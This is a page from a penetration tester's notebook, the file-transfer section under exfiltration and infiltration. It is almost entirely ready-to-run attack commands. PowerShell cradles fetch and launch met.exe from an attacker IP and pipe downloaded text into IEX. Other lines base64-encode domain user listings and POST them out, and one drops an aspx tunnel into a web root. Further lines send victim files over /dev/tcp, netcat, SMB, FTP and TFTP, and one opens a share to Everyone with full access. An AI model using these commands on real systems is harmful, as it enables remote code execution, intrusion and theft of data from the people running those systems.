Pentester's Promiscuous Notebook
BlogGitHubTwitterMastodon
Search…
⌃K
Links

File Transfer

Base64

String to base64 and POST with PowerShell:
PS > $str = cmd /c net user /domain
PS > $base64str = [Convert]::ToBase64String([System.Text.Encoding]::Unicode.GetBytes($str))
PS > IWR -Uri http://127.0.0.1/msg -Method POST -Body $base64str
File to base64 with certutil:
Cmd > certutil -encode <FILE_TO_ENCODE> C:\Windows\Temp\encoded.b64
Cmd > type C:\Windows\Temp\encoded.b64
Base64 file transfer from Linux to Windows:
$ base64 -w0 tunnel.aspx; echo
...BASE64_CONTENTS...
PS > Add-Content -Encoding UTF8 tunnel.b64 "<BASE64_CONTENTS>" -NoNewLine
PS > $data = Get-Content -Raw tunnel.b64
PS > [IO.File]::WriteAllBytes("C:\inetpub\wwwroot\uploads\tunnel.aspx", [Convert]::FromBase64String($data))

Hex

Compress a binary file and transfer it to Windows by copy-pasting commands into the console:
$ upx -9 file.exe
$ exe2hex -x file.exe -p file.cmd
$ cat file.cmd | xclip -i -sel c

PowerShell

PowerShell upload file:
PS > (New-Object Net.WebClient).UploadFile("http://10.10.13.37/file.txt", "file.txt")
PowerShell auto detect proxy, download file from remote HTTP server and run it:
$proxyAddr=(Get-ItemProperty "HKCU:\Software\Microsoft\Windows\CurrentVersion\Internet Settings").ProxyServer;$proxy=New-Object System.Net.WebProxy;$proxy.Address=$proxyAddr;$proxy.UseDefaultCredentials=$true;$client=New-Object System.Net.WebClient;$client.Proxy=$proxy;$client.DownloadFile("http://10.10.13.37/met.exe","$env:userprofile\music\met.exe");$exec=New-Object -com shell.application;$exec.shellexecute("$env:userprofile\music\met.exe")
PowerShell manually set proxy and upload file to remote HTTP server:
$client=New-Object System.Net.WebClient;$proxy=New-Object System.Net.WebProxy("http://proxy.megacorp.local:3128",$true);$creds=New-Object Net.NetworkCredential("snovvcrash","Passw0rd!","megacorp.local");$creds=$creds.GetCredential("http://proxy.megacorp.local","3128","KERBEROS");$proxy.Credentials=$creds;$client.Proxy=$proxy;$client.UploadFile("http://10.10.13.37/results.txt","results.txt")
Another proxy-aware download cradle:
New-PSDrive -Name HKU -PSProvider Registry -Root HKEY_USERS | Out-Null
$keys = Get-ChildItem "HKU:\" -ErrorAction SilentlyContinue
ForEach ($key in $keys) {if ($key.Name -like "*S-1-5-21-*") {$start=$key.Name.Substring(10);break}}
$proxyAddr=(Get-ItemProperty -Path "HKU:$start\Software\Microsoft\Windows\CurrentVersion\Internet Settings\").ProxyServer
[System.Net.WebRequest]::DefaultWebProxy = New-Object System.Net.WebProxy("http://$proxyAddr")
$wc = New-Object System.Net.WebClient
$wc.DownloadString("http://10.10.13.37/test.txt") | IEX
Remove-PSDrive -Name HKU -Force

/dev/tcp

Attacker is the sender:
# Sender:
[email protected]:~$ tar -zcvf folder.tar.gz folder
[email protected]:~$ nc -w3 -lvnp 1234 < folder.tar.gz
# Recipient:
[email protected]:~$ bash -c 'cat < /dev/tcp/127.0.0.1/1234 > .folder.tar.gz'
[email protected]:~$ tar -zxvf .folder.tar.gz
Victim is the sender:
# Recipient:
[email protected]:~$ nc -w3 -lvnp 1234 > file.txt
# Sender:
[email protected]:~$ bash -c 'cat < file.txt > /dev/tcp/127.0.0.1/1234'

SMB

smbserver.py

Start SMB server:
$ sudo smbserver.py -smb2support share `pwd`
Mount SMB in Windows with net use:
$ sudo smbserver.py -username snovvcrash -password 'Passw0rd!' -smb2support share `pwd`
Cmd > net use Z: \\10.10.13.37\share
Cmd > net use Z: \\10.10.13.37\share /u:snovvcrash 'Passw0rd!'
Mount SMB in Windows with New-PSDrive:
$ sudo smbserver.py -username snovvcrash -password 'Passw0rd!' -smb2support share `pwd`
PS > $pass = 'Passw0rd!' | ConvertTo-SecureString -AsPlainText -Force
PS > $cred = New-Object System.Management.Automation.PSCredential('snovvcrash', $pass)
Or
PS > $cred = New-Object System.Management.Automation.PSCredential('snovvcrash', $(ConvertTo-SecureString 'Passw0rd!' -AsPlainText -Force))
PS > New-PSDrive -Name Z -Root \\10.10.13.37\share -Credential $cred -PSProvider FileSystem
PS > cd Z:

net share

Cmd > net share pentest=c:\smb_pentest /GRANT:"Anonymous Logon,FULL" /GRANT:"Everyone,FULL"
Or
Cmd > net share pentest=c:\smb_pentest /GRANT:"Administrator,FULL"
Cmd > net share pentest /delete

FTP

$ python -m pip install pyftpdlib
$ python -m pyftpdlib -Dwp 2121
Cmd > cd C:\Windows\System32\spool\drivers\color
Cmd > echo 'open 127.0.0.1 2121' > ftp.txt
Cmd > echo 'user anonymous' >> ftp.txt
Cmd > echo 'anonymous' >> ftp.txt
Cmd > echo 'binary' >> ftp.txt
Cmd > echo 'put file.bin' >> ftp.txt
Cmd > echo 'bye' >> ftp.txt
Cmd > ftp -v -n -s:ftp.txt

TFTP

Send file.exe from Windows to Linux (TFTP client must be enabled on Windows):
$ sudo atftpd --daemon --bind 10.10.13.37 --port 69 ./tftp
Cmd > tftp -i 10.10.13.37 put file.exe
$ sudo pkill atftpd

Exfiltration / Infiltration

Previous
Authentication Brute Force
Next
IPMI
Last modified 25d ago